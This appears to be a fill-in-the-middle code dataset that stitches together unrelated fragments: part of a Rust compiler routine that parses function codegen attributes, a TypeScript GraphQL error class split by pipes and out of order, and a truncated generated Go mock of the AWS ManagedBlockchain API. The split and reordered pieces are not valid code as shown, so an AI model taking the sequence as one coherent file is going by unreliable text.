Some("mmx_target_feature") => rust_features.mmx_target_feature,
Some("sse4a_target_feature") => rust_features.sse4a_target_feature,
Some("tbm_target_feature") => rust_features.tbm_target_feature,
Some("wasm_target_feature") => rust_features.wasm_target_feature,
Some(name) => bug!("unknown target feature gate {}", name),
None => true,
};
if !allowed && id.is_local() {
feature_gate::emit_feature_err(
&tcx.sess.parse_sess,
feature_gate.as_ref().unwrap(),
item.span,
feature_gate::GateIssue::Language,
&format!("the target feature `{}` is currently unstable", feature),
);
continue;
}
target_features.push(Symbol::intern(feature));
}
}
}
fn linkage_by_name<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, def_id: DefId, name: &str) -> Linkage {
use rustc::mir::mono::Linkage::*;
// Use the names from src/llvm/docs/LangRef.rst here. Most types are only
// applicable to variable declarations and may not really make sense for
// Rust code in the first place but whitelist them anyway and trust that
// the user knows what s/he's doing. Who knows, unanticipated use cases
// may pop up in the future.
//
// ghost, dllimport, dllexport and linkonce_odr_autohide are not supported
// and don't have to be, LLVM treats them as no-ops.
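// Illustrative example: `#[linkage = "weak_odr"]` maps to `WeakODR` below;
// any name outside this list is reported as invalid linkage.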
match name {
"appending" => Appending,
"available_externally" => AvailableExternally,
"common" => Common,
"extern_weak" => ExternalWeak,
"external" => External,
"internal" => Internal,
"linkonce" => LinkOnceAny,
"linkonce_odr" => LinkOnceODR,
"private" => Private,
"weak" => WeakAny,
"weak_odr" => WeakODR,
_ => {
let span = tcx.hir.span_if_local(def_id);
if let Some(span) = span {
tcx.sess.span_fatal(span, "invalid linkage specified")
} else {
tcx.sess
.fatal(&format!("invalid linkage specified: {}", name))
}
}
}
}
fn codegen_fn_attrs<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, id: DefId) -> CodegenFnAttrs {
let attrs = tcx.get_attrs(id);
let mut codegen_fn_attrs = CodegenFnAttrs::new();
let whitelist = tcx.target_features_whitelist(LOCAL_CRATE);
let mut inline_span = None;
for attr in attrs.iter() {
if attr.check_name("cold") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::COLD;
} else if attr.check_name("allocator") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::ALLOCATOR;
} else if attr.check_name("unwind") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::UNWIND;
} else if attr.check_name("rustc_allocator_nounwind") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::RUSTC_ALLOCATOR_NOUNWIND;
} else if attr.check_name("naked") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::NAKED;
} else if attr.check_name("no_mangle") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::NO_MANGLE;
} else if attr.check_name("rustc_std_internal_symbol") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::RUSTC_STD_INTERNAL_SYMBOL;
} else if attr.check_name("no_debug") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::NO_DEBUG;
} else if attr.check_name("used") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::USED;
} else if attr.check_name("thread_local") {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::THREAD_LOCAL;
} else if attr.check_name("inline") {
codegen_fn_attrs.inline = attrs.iter().fold(InlineAttr::None, |ia, attr| {
if attr.path != "inline" {
return ia;
}
let meta = match attr.meta() {
Some(meta) => meta.node,
None => return ia,
};
match meta {
MetaItemKind::Word => {
mark_used(attr);
InlineAttr::Hint
}
MetaItemKind::List(ref items) => {
mark_used(attr);
inline_span = Some(attr.span);
if items.len() != 1 {
span_err!(
tcx.sess.diagnostic(),
attr.span,
E0534,
"expected one argument"
);
InlineAttr::None
} else if list_contains_name(&items[..], "always") {
InlineAttr::Always
} else if list_contains_name(&items[..], "never") {
InlineAttr::Never
} else {
span_err!(
tcx.sess.diagnostic(),
items[0].span,
E0535,
"invalid argument"
);
InlineAttr::None
}
}
_ => ia,
}
});
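// Illustrative examples: `#[inline]` yields `Hint`, `#[inline(always)]`
// yields `Always`, `#[inline(always, never)]` is rejected with E0534, and
// `#[inline(banana)]` with E0535.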
} else if attr.check_name("export_name") {
if let Some(s) = attr.value_str() {
if s.as_str().contains("\0") {
// `#[export_name = ...]` will be converted to a null-terminated string,
// so it may not contain any null characters.
struct_span_err!(
tcx.sess,
attr.span,
E0648,
"`export_name` may not contain null characters"
).emit();
}
codegen_fn_attrs.export_name = Some(s);
} else {
struct_span_err!(
tcx.sess,
attr.span,
E0558,
"`export_name` attribute has invalid format"
).span_label(attr.span, "did you mean #[export_name=\"*\"]?")
.emit();
}
} else if attr.check_name("target_feature") {
if tcx.fn_sig(id).unsafety() == Unsafety::Normal {
let msg = "#[target_feature(..)] can only be applied to \
`unsafe` function";
tcx.sess.span_err(attr.span, msg);
}
from_target_feature(
tcx,
id,
attr,
&whitelist,
&mut codegen_fn_attrs.target_features,
);
} else if attr.check_name("linkage") {
if let Some(val) = attr.value_str() {
codegen_fn_attrs.linkage = Some(linkage_by_name(tcx, id, &val.as_str()));
}
} else if attr.check_name("link_section") {
if let Some(val) = attr.value_str() {
if val.as_str().bytes().any(|b| b == 0) {
let msg = format!(
"illegal null byte in link_section \
value: `{}`",
&val
);
tcx.sess.span_err(attr.span, &msg);
} else {
codegen_fn_attrs.link_section = Some(val);
}
}
} else if attr.check_name("link_name") {
codegen_fn_attrs.link_name = attr.value_str();
}
}
// If a function uses #[target_feature] it can't be inlined into general
// purpose functions as they wouldn't have the right target features
// enabled. For that reason we also forbid #[inline(always)] as it can't be
// respected.
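// Illustrative example: on a target whitelisting `avx2`,
// `#[target_feature(enable = "avx2")] #[inline(always)] unsafe fn f() {}`
// is rejected by the check below.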
if codegen_fn_attrs.target_features.len() > 0 {
if codegen_fn_attrs.inline == InlineAttr::Always {
if let Some(span) = inline_span {
tcx.sess.span_err(
span,
"cannot use #[inline(always)] with \
#[target_feature]",
);
}
}
}
// Weak lang items have the same semantics as "std internal" symbols in the
// sense that they're preserved through all our LTO passes and only
// strippable by the linker.
//
// Additionally weak lang items have predetermined symbol names.
if tcx.is_weak_lang_item(id) {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::RUSTC_STD_INTERNAL_SYMBOL;
}
if let Some(name) = weak_lang_items::link_name(&attrs) {
codegen_fn_attrs.export_name = Some(name);
codegen_fn_attrs.link_name = Some(name);
}
// Internal symbols to the standard library all have no_mangle semantics in
// that they have defined symbol names present in the function name. This
// also applies to weak symbols where they all have known symbol names.
if codegen_fn_attrs.flags.contains(CodegenFnAttrFlags::RUSTC_STD_INTERNAL_SYMBOL) {
codegen_fn_attrs.flags |= CodegenFnAttrFlags::NO_MANGLE;
}
codegen_fn_attrs
}
| {
NestedVisitorMap::OnlyBodies(&self.tcx.hir)
} |
CannotDetermineGraphQLTypeError.ts | export class CannotDetermineGraphQLTypeError extends Error {
constructor(
typeKind: 'input' | 'output',
typeName: string,
propertyKey: string, | argName?: string
) {
let errorMessage = `Cannot determine GraphQL ${typeKind} type for `
if (argName) {
errorMessage += `argument named '${argName}' of `
} else if (parameterIndex !== undefined) {
errorMessage += `parameter #${parameterIndex} of `
}
errorMessage +=
`'${propertyKey}' of '${typeName}' class. ` +
`Is the value, that is used as its TS type or explicit type, decorated with a proper ` +
`decorator or is it a proper ${typeKind} value?`
super(errorMessage)
Object.setPrototypeOf(this, new.target.prototype)
}
} | parameterIndex?: number, |
mock.go | // Code generated by MockGen. DO NOT EDIT.
// Source: github.com/aws/aws-sdk-go/service/managedblockchain/managedblockchainiface (interfaces: ManagedBlockchainAPI)
// Package managedblockchainmock is a generated GoMock package.
package managedblockchainmock
import (
context "context"
reflect "reflect"
request "github.com/aws/aws-sdk-go/aws/request"
managedblockchain "github.com/aws/aws-sdk-go/service/managedblockchain"
gomock "github.com/golang/mock/gomock"
)
// MockManagedBlockchainAPI is a mock of ManagedBlockchainAPI interface.
type MockManagedBlockchainAPI struct {
ctrl *gomock.Controller
recorder *MockManagedBlockchainAPIMockRecorder
}
// MockManagedBlockchainAPIMockRecorder is the mock recorder for MockManagedBlockchainAPI.
type MockManagedBlockchainAPIMockRecorder struct {
mock *MockManagedBlockchainAPI
}
// NewMockManagedBlockchainAPI creates a new mock instance.
func | (ctrl *gomock.Controller) *MockManagedBlockchainAPI {
mock := &MockManagedBlockchainAPI{ctrl: ctrl}
mock.recorder = &MockManagedBlockchainAPIMockRecorder{mock}
return mock
}
// EXPECT returns an object that allows the caller to indicate expected use.
func (m *MockManagedBlockchainAPI) EXPECT() *MockManagedBlockchainAPIMockRecorder {
return m.recorder
}
// CreateMember mocks base method.
func (m *MockManagedBlockchainAPI) CreateMember(arg0 *managedblockchain.CreateMemberInput) (*managedblockchain.CreateMemberOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "CreateMember", arg0)
ret0, _ := ret[0].(*managedblockchain.CreateMemberOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// CreateMember indicates an expected call of CreateMember.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateMember(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateMember", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateMember), arg0)
}
// CreateMemberRequest mocks base method.
func (m *MockManagedBlockchainAPI) CreateMemberRequest(arg0 *managedblockchain.CreateMemberInput) (*request.Request, *managedblockchain.CreateMemberOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "CreateMemberRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.CreateMemberOutput)
return ret0, ret1
}
// CreateMemberRequest indicates an expected call of CreateMemberRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateMemberRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateMemberRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateMemberRequest), arg0)
}
// CreateMemberWithContext mocks base method.
func (m *MockManagedBlockchainAPI) CreateMemberWithContext(arg0 context.Context, arg1 *managedblockchain.CreateMemberInput, arg2 ...request.Option) (*managedblockchain.CreateMemberOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "CreateMemberWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.CreateMemberOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// CreateMemberWithContext indicates an expected call of CreateMemberWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateMemberWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateMemberWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateMemberWithContext), varargs...)
}
// CreateNetwork mocks base method.
func (m *MockManagedBlockchainAPI) CreateNetwork(arg0 *managedblockchain.CreateNetworkInput) (*managedblockchain.CreateNetworkOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "CreateNetwork", arg0)
ret0, _ := ret[0].(*managedblockchain.CreateNetworkOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// CreateNetwork indicates an expected call of CreateNetwork.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateNetwork(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateNetwork", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateNetwork), arg0)
}
// CreateNetworkRequest mocks base method.
func (m *MockManagedBlockchainAPI) CreateNetworkRequest(arg0 *managedblockchain.CreateNetworkInput) (*request.Request, *managedblockchain.CreateNetworkOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "CreateNetworkRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.CreateNetworkOutput)
return ret0, ret1
}
// CreateNetworkRequest indicates an expected call of CreateNetworkRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateNetworkRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateNetworkRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateNetworkRequest), arg0)
}
// CreateNetworkWithContext mocks base method.
func (m *MockManagedBlockchainAPI) CreateNetworkWithContext(arg0 context.Context, arg1 *managedblockchain.CreateNetworkInput, arg2 ...request.Option) (*managedblockchain.CreateNetworkOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "CreateNetworkWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.CreateNetworkOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// CreateNetworkWithContext indicates an expected call of CreateNetworkWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateNetworkWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateNetworkWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateNetworkWithContext), varargs...)
}
// CreateNode mocks base method.
func (m *MockManagedBlockchainAPI) CreateNode(arg0 *managedblockchain.CreateNodeInput) (*managedblockchain.CreateNodeOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "CreateNode", arg0)
ret0, _ := ret[0].(*managedblockchain.CreateNodeOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// CreateNode indicates an expected call of CreateNode.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateNode(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateNode", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateNode), arg0)
}
// CreateNodeRequest mocks base method.
func (m *MockManagedBlockchainAPI) CreateNodeRequest(arg0 *managedblockchain.CreateNodeInput) (*request.Request, *managedblockchain.CreateNodeOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "CreateNodeRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.CreateNodeOutput)
return ret0, ret1
}
// CreateNodeRequest indicates an expected call of CreateNodeRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateNodeRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateNodeRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateNodeRequest), arg0)
}
// CreateNodeWithContext mocks base method.
func (m *MockManagedBlockchainAPI) CreateNodeWithContext(arg0 context.Context, arg1 *managedblockchain.CreateNodeInput, arg2 ...request.Option) (*managedblockchain.CreateNodeOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "CreateNodeWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.CreateNodeOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// CreateNodeWithContext indicates an expected call of CreateNodeWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateNodeWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateNodeWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateNodeWithContext), varargs...)
}
// CreateProposal mocks base method.
func (m *MockManagedBlockchainAPI) CreateProposal(arg0 *managedblockchain.CreateProposalInput) (*managedblockchain.CreateProposalOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "CreateProposal", arg0)
ret0, _ := ret[0].(*managedblockchain.CreateProposalOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// CreateProposal indicates an expected call of CreateProposal.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateProposal(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateProposal", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateProposal), arg0)
}
// CreateProposalRequest mocks base method.
func (m *MockManagedBlockchainAPI) CreateProposalRequest(arg0 *managedblockchain.CreateProposalInput) (*request.Request, *managedblockchain.CreateProposalOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "CreateProposalRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.CreateProposalOutput)
return ret0, ret1
}
// CreateProposalRequest indicates an expected call of CreateProposalRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateProposalRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateProposalRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateProposalRequest), arg0)
}
// CreateProposalWithContext mocks base method.
func (m *MockManagedBlockchainAPI) CreateProposalWithContext(arg0 context.Context, arg1 *managedblockchain.CreateProposalInput, arg2 ...request.Option) (*managedblockchain.CreateProposalOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "CreateProposalWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.CreateProposalOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// CreateProposalWithContext indicates an expected call of CreateProposalWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) CreateProposalWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "CreateProposalWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).CreateProposalWithContext), varargs...)
}
// DeleteMember mocks base method.
func (m *MockManagedBlockchainAPI) DeleteMember(arg0 *managedblockchain.DeleteMemberInput) (*managedblockchain.DeleteMemberOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "DeleteMember", arg0)
ret0, _ := ret[0].(*managedblockchain.DeleteMemberOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// DeleteMember indicates an expected call of DeleteMember.
func (mr *MockManagedBlockchainAPIMockRecorder) DeleteMember(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "DeleteMember", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).DeleteMember), arg0)
}
// DeleteMemberRequest mocks base method.
func (m *MockManagedBlockchainAPI) DeleteMemberRequest(arg0 *managedblockchain.DeleteMemberInput) (*request.Request, *managedblockchain.DeleteMemberOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "DeleteMemberRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.DeleteMemberOutput)
return ret0, ret1
}
// DeleteMemberRequest indicates an expected call of DeleteMemberRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) DeleteMemberRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "DeleteMemberRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).DeleteMemberRequest), arg0)
}
// DeleteMemberWithContext mocks base method.
func (m *MockManagedBlockchainAPI) DeleteMemberWithContext(arg0 context.Context, arg1 *managedblockchain.DeleteMemberInput, arg2 ...request.Option) (*managedblockchain.DeleteMemberOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "DeleteMemberWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.DeleteMemberOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// DeleteMemberWithContext indicates an expected call of DeleteMemberWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) DeleteMemberWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "DeleteMemberWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).DeleteMemberWithContext), varargs...)
}
// DeleteNode mocks base method.
func (m *MockManagedBlockchainAPI) DeleteNode(arg0 *managedblockchain.DeleteNodeInput) (*managedblockchain.DeleteNodeOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "DeleteNode", arg0)
ret0, _ := ret[0].(*managedblockchain.DeleteNodeOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// DeleteNode indicates an expected call of DeleteNode.
func (mr *MockManagedBlockchainAPIMockRecorder) DeleteNode(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "DeleteNode", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).DeleteNode), arg0)
}
// DeleteNodeRequest mocks base method.
func (m *MockManagedBlockchainAPI) DeleteNodeRequest(arg0 *managedblockchain.DeleteNodeInput) (*request.Request, *managedblockchain.DeleteNodeOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "DeleteNodeRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.DeleteNodeOutput)
return ret0, ret1
}
// DeleteNodeRequest indicates an expected call of DeleteNodeRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) DeleteNodeRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "DeleteNodeRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).DeleteNodeRequest), arg0)
}
// DeleteNodeWithContext mocks base method.
func (m *MockManagedBlockchainAPI) DeleteNodeWithContext(arg0 context.Context, arg1 *managedblockchain.DeleteNodeInput, arg2 ...request.Option) (*managedblockchain.DeleteNodeOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "DeleteNodeWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.DeleteNodeOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// DeleteNodeWithContext indicates an expected call of DeleteNodeWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) DeleteNodeWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "DeleteNodeWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).DeleteNodeWithContext), varargs...)
}
// GetMember mocks base method.
func (m *MockManagedBlockchainAPI) GetMember(arg0 *managedblockchain.GetMemberInput) (*managedblockchain.GetMemberOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "GetMember", arg0)
ret0, _ := ret[0].(*managedblockchain.GetMemberOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// GetMember indicates an expected call of GetMember.
func (mr *MockManagedBlockchainAPIMockRecorder) GetMember(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetMember", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetMember), arg0)
}
// GetMemberRequest mocks base method.
func (m *MockManagedBlockchainAPI) GetMemberRequest(arg0 *managedblockchain.GetMemberInput) (*request.Request, *managedblockchain.GetMemberOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "GetMemberRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.GetMemberOutput)
return ret0, ret1
}
// GetMemberRequest indicates an expected call of GetMemberRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) GetMemberRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetMemberRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetMemberRequest), arg0)
}
// GetMemberWithContext mocks base method.
func (m *MockManagedBlockchainAPI) GetMemberWithContext(arg0 context.Context, arg1 *managedblockchain.GetMemberInput, arg2 ...request.Option) (*managedblockchain.GetMemberOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "GetMemberWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.GetMemberOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// GetMemberWithContext indicates an expected call of GetMemberWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) GetMemberWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetMemberWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetMemberWithContext), varargs...)
}
// GetNetwork mocks base method.
func (m *MockManagedBlockchainAPI) GetNetwork(arg0 *managedblockchain.GetNetworkInput) (*managedblockchain.GetNetworkOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "GetNetwork", arg0)
ret0, _ := ret[0].(*managedblockchain.GetNetworkOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// GetNetwork indicates an expected call of GetNetwork.
func (mr *MockManagedBlockchainAPIMockRecorder) GetNetwork(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetNetwork", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetNetwork), arg0)
}
// GetNetworkRequest mocks base method.
func (m *MockManagedBlockchainAPI) GetNetworkRequest(arg0 *managedblockchain.GetNetworkInput) (*request.Request, *managedblockchain.GetNetworkOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "GetNetworkRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.GetNetworkOutput)
return ret0, ret1
}
// GetNetworkRequest indicates an expected call of GetNetworkRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) GetNetworkRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetNetworkRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetNetworkRequest), arg0)
}
// GetNetworkWithContext mocks base method.
func (m *MockManagedBlockchainAPI) GetNetworkWithContext(arg0 context.Context, arg1 *managedblockchain.GetNetworkInput, arg2 ...request.Option) (*managedblockchain.GetNetworkOutput, error) {
m.ctrl.T.Helper()
varargs := []interface{}{arg0, arg1}
for _, a := range arg2 {
varargs = append(varargs, a)
}
ret := m.ctrl.Call(m, "GetNetworkWithContext", varargs...)
ret0, _ := ret[0].(*managedblockchain.GetNetworkOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// GetNetworkWithContext indicates an expected call of GetNetworkWithContext.
func (mr *MockManagedBlockchainAPIMockRecorder) GetNetworkWithContext(arg0, arg1 interface{}, arg2 ...interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
varargs := append([]interface{}{arg0, arg1}, arg2...)
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetNetworkWithContext", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetNetworkWithContext), varargs...)
}
// GetNode mocks base method.
func (m *MockManagedBlockchainAPI) GetNode(arg0 *managedblockchain.GetNodeInput) (*managedblockchain.GetNodeOutput, error) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "GetNode", arg0)
ret0, _ := ret[0].(*managedblockchain.GetNodeOutput)
ret1, _ := ret[1].(error)
return ret0, ret1
}
// GetNode indicates an expected call of GetNode.
func (mr *MockManagedBlockchainAPIMockRecorder) GetNode(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetNode", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetNode), arg0)
}
// GetNodeRequest mocks base method.
func (m *MockManagedBlockchainAPI) GetNodeRequest(arg0 *managedblockchain.GetNodeInput) (*request.Request, *managedblockchain.GetNodeOutput) {
m.ctrl.T.Helper()
ret := m.ctrl.Call(m, "GetNodeRequest", arg0)
ret0, _ := ret[0].(*request.Request)
ret1, _ := ret[1].(*managedblockchain.GetNodeOutput)
return ret0, ret1
}
// GetNodeRequest indicates an expected call of GetNodeRequest.
func (mr *MockManagedBlockchainAPIMockRecorder) GetNodeRequest(arg0 interface{}) *gomock.Call {
mr.mock.ctrl.T.Helper()
return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "GetNodeRequest", reflect.TypeOf((*MockManagedBlockchainAPI)(nil).GetNodeRequest), arg0)
}
// GetNodeWithContext mocks base method.
